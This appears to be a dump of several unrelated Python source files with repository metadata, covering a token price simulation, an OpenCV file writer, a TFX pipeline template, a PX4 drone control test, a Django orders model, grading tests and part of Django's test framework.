l=(i/2)/(oneyear*8+2)
stakeperday=4*10**5
if staked<s:
if s>stakeperday:
staked+=stakeperday
s-=stakeperday
elif staked>stakeperday/2:
staked-=stakeperday/2
s+=stakeperday/2
mineperhalfday=(1.0*dotpersec/(2**l))*oneday/2
if allmine+mineperhalfday>mtop:
realmine=mtop-allmine
else:
realmine=mineperhalfday
allmine+=realmine
s+=realmine
newprice=b/(cw*s)
b+=realmine*percentforbancor*0.9*newprice
newprice=b/(cw*s)
bprice=bprice0*random.uniform(0.88,1.15)
if i%30==0:
buymoney=bprice*1050000.0
sellmoney=bprice*50000.0
elif i%31==0:
buymoney=bprice*800000.0
sellmoney=buymoney*random.uniform(0.9,1.78)
elif newprice>1.05:
buymoney=bprice*110000.0
sellmoney=buymoney*random.uniform(0.91,2.1)
else:
buymoney=bprice*130000.0
sellmoney=buymoney*random.uniform(0.8,1.1)
buy=buymoney*1.0/bprice
if buy<=0:
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
continue
if i%2==0:#buy
fee=buy*feerate
realbuybeforerate=buy
buyafterrate=buy-fee
token=-1*s*(1-(1+buyafterrate/b)**cw)
nowtop=s0+allmine+stop
if (s+token>nowtop):
realtoken=nowtop-s
realbuybeforerate=-1*b*(1-(1+realtoken/s)**(1/cw))
fee=realbuybeforerate*feerate
realbuy=realbuybeforerate-fee
realtoken=-1*s*(1-(1+realbuy/b)**cw)
else:
realtoken=token
realbuy=buyafterrate
s+=realtoken
b+=realbuybeforerate
#tokentobp=realtoken*feerate*toBP
#newprice=realbuybeforerate/realtoken
newprice=b/(cw*s)
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
else:#sell
sell=sellmoney/bprice/newprice
sell*=1-feerate*toBP
#btcdownmaybe=random.uniform(0.33,3)
#if btcdownmaybe>0.8 and btcdownmaybe<1.0:
# sell=sell*3
# bprice*=0.5
if sell>s:
realsell=s
else:
realsell=sell
e=b*(1-(1-realsell/s)**(1/cw))
if b<e:
newprice=b/(cw*s)
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice*10**3)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
continue
s-=realsell
reale=e*(1-feerate*toBP)
b-=reale
#if (e>0):
#newprice=reale/realsell
newprice=b/(cw*s)
blista[j].append(b/10**6)
slista[j].append(s/10**6)
plista[j].append(newprice)
splista[j].append((s0+stop+allmine)*newprice*bprice/10**9)
colorlist=["red","green","yellow","grey"]
sp=plt.subplot(411)
for j in jlist:
sp.plot(t,np.array(slista[j]), color=colorlist[j])
bp=plt.subplot(412)
for j in jlist:
bp.plot(t,np.array(blista[j]), color=colorlist[j])
pp=plt.subplot(413)
for j in jlist:
pp.plot(t,np.array(plista[j]), color=colorlist[j])
spp=plt.subplot(414)
for j in jlist:
spp.plot(t,np.array(splista[j]), color=colorlist[j])
plt.legend()
pp.set_title("Price-1/2Day")
pp.set_ylabel("EOS")
p0=b0/(cwlist[0]*s0)
p3=b0/(cwlist[3]*s0)
ibo0=p0*1.8*10**8
ibo3=p3*1.8*10**8
sp.set_title("cw="+str(round(cwlist[0]*100,1))+"%-"+str(round(cwlist[3]*100,1))+"% rate="+str(round(100*percentforbancor,1))+"% fee="+str(round(100*feerate,1))+"%("+str(round(toBP*100,1))+"% to BP)\nIBO:"+str(round(ibo0/10**6,2))+"mEOS/Reserve:"+str(round(b0/ibo0*100,2))+"%-"+str(round(ibo3/10**6,2))+"mEOS/Reserve:"+str(round(b0/ibo3*100,2))+"%\nSupply-1/2Day")
sp.set_ylabel("mDOT")
bp.set_title("Reserve-1/2Day")
bp.set_ylabel("mEOS")
spp.set_title("Market Cap-1/2Day")
spp.set_ylabel("bRMB")
plt.tight_layout()
plt.show()
| 25.619048 | 363 | 0.662872 |
795544040a0f1f4d0ba64676987cfd367deebc02 | 704 | py | Python | Projective-Geometry/bergar/com.bergar.simonsen.homography/tools/IO.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | [
"Apache-2.0"
] | 12 | 2017-05-26T12:04:38.000Z | 2021-07-11T04:42:19.000Z | Projective-Geometry/bergar/com.bergar.simonsen.homography/tools/IO.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | [
"Apache-2.0"
] | null | null | null | Projective-Geometry/bergar/com.bergar.simonsen.homography/tools/IO.py | tonybeltramelli/Graphics-And-Vision | a1dbeada8e907b119ecce1fe421ae91e64ff3371 | [
"Apache-2.0"
] | 4 | 2017-05-09T08:26:44.000Z | 2018-04-23T03:16:01.000Z | __author__ = 'bs'
import cv2
from config.Const import *
from tools import Utils
import numpy as np
def writeImage(I):
    """Write image ``I`` into SAVE_FOLDER without overwriting existing files.

    Tries ``OUTPUT_IMAGE + JPG_EXTENSION`` first; while the candidate file
    already exists, falls back to ``OUTPUT_IMAGE_<i>`` names for up to
    MAX_FILES attempts, writing the first free name.
    """
    fName = SAVE_FOLDER + OUTPUT_IMAGE + JPG_EXTENSION
    for i in range(MAX_FILES):
        if not Utils.doesFileExist(fName):
            # BUG FIX: fName already starts with SAVE_FOLDER; the original
            # called cv2.imwrite(SAVE_FOLDER + fName, I), doubling the prefix
            # and writing to a wrong nested path.
            cv2.imwrite(fName, I)
            break
        else:
            fName = SAVE_FOLDER + OUTPUT_IMAGE + "_" + str(i) + JPG_EXTENSION
def writeHomography(H):
    """Persist homography matrix ``H`` as a .npy file, never overwriting.

    Tries ``OUTPUT_MATRIX + NPY_EXTENSION`` first, then ``OUTPUT_MATRIX_<i>``
    fallbacks, saving to the first name that does not exist yet (at most
    MAX_FILES candidates are probed).
    """
    candidate = SAVE_FOLDER + OUTPUT_MATRIX + NPY_EXTENSION
    for attempt in range(MAX_FILES):
        if Utils.doesFileExist(candidate):
            # name taken: try the next suffixed candidate
            candidate = SAVE_FOLDER + OUTPUT_MATRIX + "_" + str(attempt) + NPY_EXTENSION
            continue
        np.save(candidate, H)
        break
795545b75a3708590252f2c4216a291a8a4a49b7 | 355 | py | Python | src/aturtle/shapes/__init__.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 3 | 2019-12-23T15:25:39.000Z | 2022-02-25T22:09:49.000Z | src/aturtle/shapes/__init__.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 55 | 2019-12-27T14:05:02.000Z | 2020-02-01T09:53:42.000Z | src/aturtle/shapes/__init__.py | fabricejumel/python-aturtle | 008f71a5e506cb58465f85ee9dc8ea1bffa6fc49 | [
"MIT"
] | 1 | 2020-02-25T08:18:51.000Z | 2020-02-25T08:18:51.000Z | # ----------------------------------------------------------------------------
# Python A-Turtle
# ----------------------------------------------------------------------------
# Copyright (c) Tiago Montes.
# See LICENSE for details.
# ----------------------------------------------------------------------------
from . import bitmap
from . import vector
| 35.5 | 78 | 0.242254 |
79554678b240bfc74b9a5920187d53569743b5e4 | 6,273 | py | Python | tfx/experimental/templates/penguin/pipeline/pipeline.py | ajmarcus/tfx | 28ac2be5ace31ca733f6292495f8be83484a1730 | [
"Apache-2.0"
] | null | null | null | tfx/experimental/templates/penguin/pipeline/pipeline.py | ajmarcus/tfx | 28ac2be5ace31ca733f6292495f8be83484a1730 | [
"Apache-2.0"
] | null | null | null | tfx/experimental/templates/penguin/pipeline/pipeline.py | ajmarcus/tfx | 28ac2be5ace31ca733f6292495f8be83484a1730 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX penguin template pipeline definition.
This file defines TFX pipeline and various components in the pipeline.
"""
from typing import List, Optional, Text
import tensorflow_model_analysis as tfma
from tfx import v1 as tfx
from tfx.experimental.templates.penguin.models import features
from ml_metadata.proto import metadata_store_pb2
def create_pipeline(
    pipeline_name: Text,
    pipeline_root: Text,
    data_path: Text,
    preprocessing_fn: Text,
    run_fn: Text,
    train_args: tfx.proto.TrainArgs,
    eval_args: tfx.proto.EvalArgs,
    eval_accuracy_threshold: float,
    serving_model_dir: Text,
    metadata_connection_config: Optional[
        metadata_store_pb2.ConnectionConfig] = None,
    beam_pipeline_args: Optional[List[Text]] = None,
) -> tfx.dsl.Pipeline:
  """Implements the penguin pipeline with TFX.

  Args:
    pipeline_name: name of the pipeline.
    pipeline_root: root directory for pipeline outputs and artifacts.
    data_path: directory containing the CSV data read by CsvExampleGen.
    preprocessing_fn: fully-qualified name of the Transform preprocessing_fn.
    run_fn: fully-qualified name of the Trainer run_fn.
    train_args: Trainer training arguments.
    eval_args: Trainer evaluation arguments.
    eval_accuracy_threshold: lower bound on SparseCategoricalAccuracy that a
      candidate model must reach for the Evaluator to bless it.
    serving_model_dir: filesystem directory the Pusher exports the model to.
    metadata_connection_config: optional ML Metadata connection config.
    beam_pipeline_args: optional arguments for the Beam runner.

  Returns:
    A `tfx.dsl.Pipeline`. Note: this is a template — several components below
    are constructed but only appended to the pipeline once the numbered
    TODO lines (steps 3-5) are un-commented.
  """
  components = []
  # Brings data into the pipeline or otherwise joins/converts training data.
  # TODO(step 2): Might use another ExampleGen class for your data.
  example_gen = tfx.components.CsvExampleGen(input_base=data_path)
  components.append(example_gen)
  # Computes statistics over data for visualization and example validation.
  statistics_gen = tfx.components.StatisticsGen(
      examples=example_gen.outputs['examples'])
  components.append(statistics_gen)
  # Generates schema based on statistics files.
  schema_gen = tfx.components.SchemaGen(
      statistics=statistics_gen.outputs['statistics'], infer_feature_shape=True)
  components.append(schema_gen)
  # Performs anomaly detection based on statistics and data schema.
  example_validator = tfx.components.ExampleValidator(  # pylint: disable=unused-variable
      statistics=statistics_gen.outputs['statistics'],
      schema=schema_gen.outputs['schema'])
  components.append(example_validator)
  # Performs transformations and feature engineering in training and serving.
  transform = tfx.components.Transform(  # pylint: disable=unused-variable
      examples=example_gen.outputs['examples'],
      schema=schema_gen.outputs['schema'],
      preprocessing_fn=preprocessing_fn)
  # TODO(step 3): Uncomment here to add Transform to the pipeline.
  # components.append(transform)
  # Uses user-provided Python function that implements a model using Tensorflow.
  trainer = tfx.components.Trainer(
      run_fn=run_fn,
      examples=example_gen.outputs['examples'],
      # Use outputs of Transform as training inputs if Transform is used.
      # examples=transform.outputs['transformed_examples'],
      # transform_graph=transform.outputs['transform_graph'],
      schema=schema_gen.outputs['schema'],
      train_args=train_args,
      eval_args=eval_args)
  # TODO(step 4): Uncomment here to add Trainer to the pipeline.
  # components.append(trainer)
  # Get the latest blessed model for model validation.
  model_resolver = tfx.dsl.Resolver(
      strategy_class=tfx.dsl.experimental.LatestBlessedModelStrategy,
      model=tfx.dsl.Channel(type=tfx.types.standard_artifacts.Model),
      model_blessing=tfx.dsl.Channel(
          type=tfx.types.standard_artifacts.ModelBlessing)).with_id(
              'latest_blessed_model_resolver')
  # TODO(step 5): Uncomment here to add Resolver to the pipeline.
  # components.append(model_resolver)
  # Uses TFMA to compute a evaluation statistics over features of a model and
  # perform quality validation of a candidate model (compared to a baseline).
  eval_config = tfma.EvalConfig(
      model_specs=[
          tfma.ModelSpec(
              signature_name='serving_default',
              label_key=features.LABEL_KEY,
              # Use transformed label key if Transform is used.
              # label_key=features.transformed_name(features.LABEL_KEY),
              preprocessing_function_names=['transform_features'])
      ],
      slicing_specs=[tfma.SlicingSpec()],
      metrics_specs=[
          tfma.MetricsSpec(metrics=[
              tfma.MetricConfig(
                  class_name='SparseCategoricalAccuracy',
                  threshold=tfma.MetricThreshold(
                      value_threshold=tfma.GenericValueThreshold(
                          lower_bound={'value': eval_accuracy_threshold}),
                      # require the candidate not to be worse than baseline
                      change_threshold=tfma.GenericChangeThreshold(
                          direction=tfma.MetricDirection.HIGHER_IS_BETTER,
                          absolute={'value': -1e-10})))
          ])
      ])
  evaluator = tfx.components.Evaluator(  # pylint: disable=unused-variable
      examples=example_gen.outputs['examples'],
      model=trainer.outputs['model'],
      baseline_model=model_resolver.outputs['model'],
      # Change threshold will be ignored if there is no baseline (first run).
      eval_config=eval_config)
  # TODO(step 5): Uncomment here to add Evaluator to the pipeline.
  # components.append(evaluator)
  # Pushes the model to a file destination if check passed.
  pusher = tfx.components.Pusher(  # pylint: disable=unused-variable
      model=trainer.outputs['model'],
      model_blessing=evaluator.outputs['blessing'],
      push_destination=tfx.proto.PushDestination(
          filesystem=tfx.proto.PushDestination.Filesystem(
              base_directory=serving_model_dir)))
  # TODO(step 5): Uncomment here to add Pusher to the pipeline.
  # components.append(pusher)
  return tfx.dsl.Pipeline(
      pipeline_name=pipeline_name,
      pipeline_root=pipeline_root,
      components=components,
      # Change this value to control caching of execution results. Default value
      # is `False`.
      # enable_cache=True,
      metadata_connection_config=metadata_connection_config,
      beam_pipeline_args=beam_pipeline_args,
  )
79554691d429ac492a323bea1c35a6c1e457cc6e | 4,103 | py | Python | integrationtests/python_src/px4_it/mavros/mavros_airsim_test.py | CodexLabsLLC/PX4-Autopilot | 928f481b2e17e43e56f51a5661141761c8e88d61 | [
"BSD-3-Clause"
] | null | null | null | integrationtests/python_src/px4_it/mavros/mavros_airsim_test.py | CodexLabsLLC/PX4-Autopilot | 928f481b2e17e43e56f51a5661141761c8e88d61 | [
"BSD-3-Clause"
] | null | null | null | integrationtests/python_src/px4_it/mavros/mavros_airsim_test.py | CodexLabsLLC/PX4-Autopilot | 928f481b2e17e43e56f51a5661141761c8e88d61 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import division
PKG = 'px4'
import rospy
from geometry_msgs.msg import Quaternion, Vector3
from mavros_msgs.msg import AttitudeTarget
from mavros_test_common import MavrosTestCommon
# from pymavlink import mavutil
from six.moves import xrange
from std_msgs.msg import Header
from threading import Thread
from tf.transformations import quaternion_from_euler
class MavrosOffboardAttctlTest(MavrosTestCommon):
"""
Tests flying in offboard control by sending attitude and thrust setpoints
via MAVROS.
For the test to be successful it needs to cross a certain boundary in time.
"""
def setUp(self):
super(MavrosOffboardAttctlTest, self).setUp()
self.att = AttitudeTarget()
self.att_setpoint_pub = rospy.Publisher(
'mavros/setpoint_raw/attitude', AttitudeTarget, queue_size=1)
# send setpoints in seperate thread to better prevent failsafe
self.att_thread = Thread(target=self.send_att, args=())
self.att_thread.daemon = True
self.att_thread.start()
def tearDown(self):
super(MavrosOffboardAttctlTest, self).tearDown()
#
# Helper methods
#
def send_att(self):
rate = rospy.Rate(10) # Hz
self.att.body_rate = Vector3()
self.att.header = Header()
self.att.header.frame_id = "base_footprint"
self.att.orientation = Quaternion(*quaternion_from_euler(-0.25, 0.15,
0))
self.att.thrust = 0.7
self.att.type_mask = 7 # ignore body rate
while not rospy.is_shutdown():
self.att.header.stamp = rospy.Time.now()
self.att_setpoint_pub.publish(self.att)
try: # prevent garbage in console output when thread is killed
rate.sleep()
except rospy.ROSInterruptException:
pass
#
# Test method
#
def test_attctl(self):
"""Test offboard attitude control"""
# boundary to cross
boundary_x = 200
boundary_y = 100
boundary_z = 20
# make sure the simulation is ready to start the mission
self.wait_for_topics(60)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 10, -1)
self.log_topic_vars()
self.set_mode("OFFBOARD", 5)
self.set_arm(True, 5)
rospy.loginfo("run mission")
rospy.loginfo("attempting to cross boundary | x: {0}, y: {1}, z: {2}".
format(boundary_x, boundary_y, boundary_z))
# does it cross expected boundaries in 'timeout' seconds?
timeout = 90 # (int) seconds
loop_freq = 2 # Hz
rate = rospy.Rate(loop_freq)
crossed = False
for i in xrange(timeout * loop_freq):
if (self.local_position.pose.position.x > boundary_x and
self.local_position.pose.position.y > boundary_y and
self.local_position.pose.position.z > boundary_z):
rospy.loginfo("boundary crossed | seconds: {0} of {1}".format(
i / loop_freq, timeout))
crossed = True
break
try:
rate.sleep()
except rospy.ROSException as e:
self.fail(e)
self.assertTrue(crossed, (
"took too long to cross boundaries | current position x: {0:.2f}, y: {1:.2f}, z: {2:.2f} | timeout(seconds): {3}".
format(self.local_position.pose.position.x,
self.local_position.pose.position.y,
self.local_position.pose.position.z, timeout)))
self.set_mode("AUTO.LAND", 5)
# self.wait_for_landed_state(mavutil.mavlink.MAV_LANDED_STATE_ON_GROUND,
# 90, 0)
self.set_arm(False, 5)
if __name__ == '__main__':
import rostest
rospy.init_node('test_node', anonymous=True)
rostest.rosrun(PKG, 'mavros_offboard_attctl_test',
MavrosOffboardAttctlTest) | 34.771186 | 126 | 0.60468 |
79554778b027d2a1169d32de98dc9344fca45f45 | 3,645 | py | Python | orders/models.py | abhishek593/IITISOC_LaFrescoInPocket | dd91b99ea60fb2753d4715e8890c0c7dc26b8b99 | [
"MIT"
] | null | null | null | orders/models.py | abhishek593/IITISOC_LaFrescoInPocket | dd91b99ea60fb2753d4715e8890c0c7dc26b8b99 | [
"MIT"
] | null | null | null | orders/models.py | abhishek593/IITISOC_LaFrescoInPocket | dd91b99ea60fb2753d4715e8890c0c7dc26b8b99 | [
"MIT"
] | null | null | null | from django.conf import settings
from django.core.mail import send_mail
from django.db import models
from django.db.models.signals import post_save
from django.dispatch import receiver
from cart.models import Cart
class Order(models.Model):
cart = models.OneToOneField(Cart, on_delete=models.CASCADE, primary_key=True)
order_id = models.CharField(max_length=40)
ORDER_STATUS_CHOICES = [
('created', 'Created'),
('prepared', 'Prepared'),
('paid', 'Paid'),
('cancelled_by_user', 'Cancelled By User'),
('cancelled_by_admin', 'Cancelled By Admin')
]
previous_status = models.CharField(max_length=30, choices=ORDER_STATUS_CHOICES, default='created')
status = models.CharField(max_length=30, choices=ORDER_STATUS_CHOICES, default='created')
timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)
total = models.PositiveIntegerField()
def __str__(self):
return self.order_id
def get_human_rep_of_status(self):
for status in self.ORDER_STATUS_CHOICES:
if self.status == status[0]:
return status[1]
return None
def add_items_back(instance):
    """Return the quantities reserved by a cancelled order to stock.

    Walks every cart item attached to the order's cart and credits the
    ordered quantity back to the related item's available_quantity.
    """
    for entry in instance.cart.items.all():
        entry.item.available_quantity += entry.quantity
        entry.item.save()
@receiver(post_save, sender=Order)
def send_order_mail(sender, instance, created, **kwargs):
    """Email the customer whenever an order's status changes.

    Triggered by post_save on Order. Acts only when the status actually
    changed (previous_status != status). For cancelled orders the reserved
    stock is returned to the inventory. 'paid' sends no email but still
    records the transition.

    Fix vs. the previous version: the trailing ``instance.save()`` re-fired
    this post_save handler, causing one redundant recursive save per status
    change. previous_status is now persisted with a queryset ``update()``,
    which emits no signals.
    """
    if instance.previous_status == instance.status:
        return
    # (subject, message template) per status; message bodies are unchanged.
    notifications = {
        'created': (
            'LaFresco Order received.',
            """
            Your order has been received by LaFresco Team.
            We are working on it and will notify you when the order is completed.
            Here is the ORDER_ID {} which you can use to contact us in case of any query.
            Happy Shopping!.
            """,
        ),
        'prepared': (
            'LaFresco Order prepared.',
            """
            Your order has been prepared by LaFresco Team.
            In case You don't have your ORDER_ID, here it is {}.
            Happy Shopping!.
            """,
        ),
        'cancelled_by_user': (
            'LaFresco Order Cancelled by you.',
            'Your order with ORDER_ID {} has been successfully cancelled.',
        ),
        'cancelled_by_admin': (
            'LaFresco Order Cancelled by store.',
            """
            Your order with ORDER_ID {} has been cancelled due to some issues.
            We deeply regret the inconvenience caused.
            """,
        ),
    }
    if instance.status in notifications:
        subject, template = notifications[instance.status]
        send_mail(subject=subject, message=template.format(instance.order_id),
                  from_email=settings.EMAIL_HOST_USER,
                  recipient_list=[instance.cart.user.email], fail_silently=False)
    if instance.status in ('cancelled_by_user', 'cancelled_by_admin'):
        # Cancellations hand the ordered quantities back to the inventory.
        add_items_back(instance)
    # Persist the transition without instance.save(), so this handler is not
    # re-entered; QuerySet.update() bypasses save() and emits no signals.
    instance.previous_status = instance.status
    sender.objects.filter(pk=instance.pk).update(previous_status=instance.status)
| 43.915663 | 110 | 0.653224 |
795547f348c11816797a9f419e52e1639831be2e | 2,623 | py | Python | rnbgrader/tests/test_grids.py | matthew-brett/rnbgrader | f07494f59dd0d1cb97c094ac2ea9e9d1243f0f70 | [
"BSD-2-Clause"
] | null | null | null | rnbgrader/tests/test_grids.py | matthew-brett/rnbgrader | f07494f59dd0d1cb97c094ac2ea9e9d1243f0f70 | [
"BSD-2-Clause"
] | null | null | null | rnbgrader/tests/test_grids.py | matthew-brett/rnbgrader | f07494f59dd0d1cb97c094ac2ea9e9d1243f0f70 | [
"BSD-2-Clause"
] | null | null | null | """ Test grading paths
"""
import numpy as np
from rnbgrader.chunkrunner import EvaluatedChunk
from rnbgrader.grids import full_grid, max_multi
from numpy.testing import assert_array_equal
def test_full_grid():
    # Test calculation of grid from results, answers. An answer returns marks
    # from a result. Results are sequences of EvaluatedChunks. A evaluated
    # chunk is the association of (chunk, result). The grid contains NaN where
    # the result has not been compared to the answer, and a mark otherwise. A
    # full grid compares all evaluated chunks to all answers.
    answers = [lambda x : 11 if x.results == [1] else 0,
               lambda x : 12 if x.results == [2] else 0,
               lambda x : 13 if x.results == [3] else 0,
               lambda x : 14 if x.results == [4] else 0]
    ev_chunks = [EvaluatedChunk(*t) for t in (
        (None, [1]), (None, [2]), (None, [3]), (None, [4]))]
    # Answer i matches chunk i exactly, so the full grid is diagonal.
    grid = full_grid(answers, ev_chunks)
    assert np.all(grid == np.diag([11, 12, 13, 14]))
    # Reversing the chunk order permutes the grid columns; reversing the
    # answer order permutes the rows.
    grid = full_grid(answers, ev_chunks[::-1])
    assert np.all(grid == np.fliplr(np.diag([11, 12, 13, 14])))
    grid = full_grid(answers[::-1], ev_chunks)
    assert np.all(grid == np.fliplr(np.diag([14, 13, 12, 11])))
    grid = full_grid(answers[::-1], ev_chunks[::-1])
    assert np.all(grid == np.diag([14, 13, 12, 11]))
    # A chunk whose results are None earns no marks from any answer.
    ev_chunks[2].results = None
    grid = full_grid(answers, ev_chunks)
    np.testing.assert_array_equal(grid, [[11, 0, 0, 0],
                                         [0, 12, 0, 0],
                                         [0, 0, 0, 0],
                                         [0, 0, 0, 14]])
    # One answer may award marks to several chunks (here columns 1 and 2).
    ev_chunks[2].results = [3]
    answers[2] = lambda x : 13 if x.results in ([3], [2]) else 0
    grid = full_grid(answers, ev_chunks)
    np.testing.assert_array_equal(grid, [[11, 0, 0, 0],
                                         [0, 12, 0, 0],
                                         [0, 13, 13, 0],
                                         [0, 0, 0, 14]])
def test_max_multi():
    """Check per-column maxima with NaNs treated as zero."""
    # (input grid, expected column maxima) pairs, asserted in order.
    cases = (
        ([[1, 2], [3, 4]], [2, 4]),
        ([[2, 1], [4, 3]], [2, 4]),
        # Same chunk gives max score on two questions.
        ([[2, 1, 4], [4, 3, 6]], [4, 6]),
        # NaNs treated as zero
        ([[2, np.nan, 4], [np.nan, 3, 6]], [4, 6]),
        ([[np.nan, np.nan, np.nan], [np.nan, 3, 6]], [0, 6]),
        (np.ones((4, 4)), np.ones((4,))),
        (np.ones((4, 4)) + np.nan, np.zeros((4,))),
    )
    for grid, expected in cases:
        assert_array_equal(max_multi(grid), expected)
| 45.224138 | 78 | 0.55204 |
795548358453ddc1441b0b203fb47f59e5e378a9 | 1,018 | py | Python | snipbin/test/test.py | landsurveyorsunited/snippy-extension | efa4681ea4f33497726004b9cad360a31a4caf60 | [
"CC-BY-3.0"
] | null | null | null | snipbin/test/test.py | landsurveyorsunited/snippy-extension | efa4681ea4f33497726004b9cad360a31a4caf60 | [
"CC-BY-3.0"
] | null | null | null | snipbin/test/test.py | landsurveyorsunited/snippy-extension | efa4681ea4f33497726004b9cad360a31a4caf60 | [
"CC-BY-3.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) 2009 Riccardo Govoni. All rights reserved.
# Use of this source code is governed by the MIT License and Creative Commons
# Attribution License 3.0. Both of them can be found in the LICENSE file.
import os.path
from google.appengine.api import users
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from google.appengine.ext.webapp.util import run_wsgi_app
from py import snipglobals
class TestHandler(webapp.RequestHandler):
  """Serves GET /test by rendering the test.html template."""

  def get(self):
    # initialize_user resolves the user and the shared template context
    # (and may touch cookies on the response); the user itself is unused.
    _user, template_values = snipglobals.initialize_user(self.request,
                                                         self.response)
    template_path = os.path.join(os.path.dirname(__file__),
                                 '../templates/test.html')
    self.response.out.write(template.render(template_path, template_values))
# WSGI application mapping /test to the handler above; debug=True surfaces
# tracebacks in the browser.
application = webapp.WSGIApplication([('/test', TestHandler)],
                                     debug=True)
def main():
  # Entry point invoked by the App Engine CGI runtime.
  run_wsgi_app(application)
if __name__ == '__main__':
  main()
| 29.085714 | 78 | 0.68664 |
7955488f48bd804020fe23407a705c628de5612e | 54,928 | py | Python | django/test/testcases.py | bak1an/django | 98bcc5d81bca578f3a5b4d47907ba4ac40446887 | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/test/testcases.py | bak1an/django | 98bcc5d81bca578f3a5b4d47907ba4ac40446887 | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | django/test/testcases.py | bak1an/django | 98bcc5d81bca578f3a5b4d47907ba4ac40446887 | [
"PSF-2.0",
"BSD-3-Clause"
] | null | null | null | import difflib
import json
import posixpath
import sys
import threading
import unittest
from collections import Counter
from contextlib import contextmanager
from copy import copy
from functools import wraps
from unittest.util import safe_repr
from urllib.parse import unquote, urljoin, urlparse, urlsplit
from urllib.request import url2pathname
from django.apps import apps
from django.conf import settings
from django.core import mail
from django.core.exceptions import ValidationError
from django.core.files import locks
from django.core.handlers.wsgi import WSGIHandler, get_path_info
from django.core.management import call_command
from django.core.management.color import no_style
from django.core.management.sql import emit_post_migrate_signal
from django.core.servers.basehttp import ThreadedWSGIServer, WSGIRequestHandler
from django.db import DEFAULT_DB_ALIAS, connection, connections, transaction
from django.forms.fields import CharField
from django.http import QueryDict
from django.http.request import split_domain_port, validate_host
from django.test.client import Client
from django.test.html import HTMLParseError, parse_html
from django.test.signals import setting_changed, template_rendered
from django.test.utils import (
CaptureQueriesContext, ContextList, compare_xml, modify_settings,
override_settings,
)
from django.utils.decorators import classproperty
from django.utils.encoding import force_text
from django.views.static import serve
# Names exported by ``from django.test.testcases import *``.
__all__ = ('TestCase', 'TransactionTestCase',
           'SimpleTestCase', 'skipIfDBFeature', 'skipUnlessDBFeature')
def to_list(value):
    """
    Normalize ``value`` to a list.

    ``None`` becomes an empty list, an existing list is returned unchanged,
    and any other value is wrapped in a single-element list.
    """
    if value is None:
        return []
    if isinstance(value, list):
        return value
    return [value]
def assert_and_parse_html(self, html, user_msg, msg):
    """Parse ``html`` into a DOM, failing ``self`` (a test case) with ``msg``
    plus the parser error when the markup is invalid."""
    try:
        return parse_html(html)
    except HTMLParseError as e:
        # self.fail raises, so there is nothing to return on this path.
        self.fail(self._formatMessage(user_msg, '%s\n%s' % (msg, e)))
class _AssertNumQueriesContext(CaptureQueriesContext):
    """Capture queries on ``connection`` and assert exactly ``num`` ran."""

    def __init__(self, test_case, num, connection):
        self.test_case = test_case
        self.num = num
        super().__init__(connection)

    def __exit__(self, exc_type, exc_value, traceback):
        super().__exit__(exc_type, exc_value, traceback)
        # Don't mask an exception raised inside the ``with`` block.
        if exc_type is not None:
            return
        executed = len(self)
        captured = '\n'.join(query['sql'] for query in self.captured_queries)
        self.test_case.assertEqual(
            executed, self.num,
            "%d queries executed, %d expected\nCaptured queries were:\n%s"
            % (executed, self.num, captured)
        )
class _AssertTemplateUsedContext:
    """Context manager that fails the test unless ``template_name`` rendered
    inside the ``with`` block."""

    def __init__(self, test_case, template_name):
        self.test_case = test_case
        self.template_name = template_name
        self.rendered_templates = []
        self.rendered_template_names = []
        self.context = ContextList()

    def on_template_render(self, sender, signal, template, context, **kwargs):
        # Record every render so __exit__ can inspect what happened.
        self.rendered_templates.append(template)
        self.rendered_template_names.append(template.name)
        self.context.append(copy(context))

    def test(self):
        return self.template_name in self.rendered_template_names

    def message(self):
        return '%s was not rendered.' % self.template_name

    def __enter__(self):
        template_rendered.connect(self.on_template_render)
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        template_rendered.disconnect(self.on_template_render)
        # Don't mask an exception raised inside the ``with`` block.
        if exc_type is not None:
            return
        if self.test():
            return
        message = self.message()
        if self.rendered_templates:
            message += ' Following templates were rendered: %s' % (
                ', '.join(self.rendered_template_names))
        else:
            message += ' No template was rendered.'
        self.test_case.fail(message)
class _AssertTemplateNotUsedContext(_AssertTemplateUsedContext):
    """Inverse of _AssertTemplateUsedContext: fail if the template rendered."""

    def test(self):
        # Pass exactly when the parent's membership check fails.
        return not super().test()

    def message(self):
        return '%s was rendered.' % self.template_name
class _CursorFailure:
def __init__(self, cls_name, wrapped):
self.cls_name = cls_name
self.wrapped = wrapped
def __call__(self):
raise AssertionError(
"Database queries aren't allowed in SimpleTestCase. "
"Either use TestCase or TransactionTestCase to ensure proper test isolation or "
"set %s.allow_database_queries to True to silence this failure." % self.cls_name
)
class SimpleTestCase(unittest.TestCase):
    """
    Django's base test case: provides a test client, a fresh mail.outbox per
    test, settings/modify_settings override hooks, and the assert* helpers
    below, without performing any database setup. Opening a database cursor
    raises an AssertionError unless ``allow_database_queries`` is True (the
    cursors are wrapped with _CursorFailure in setUpClass).
    """
    # The class we'll use for the test client self.client.
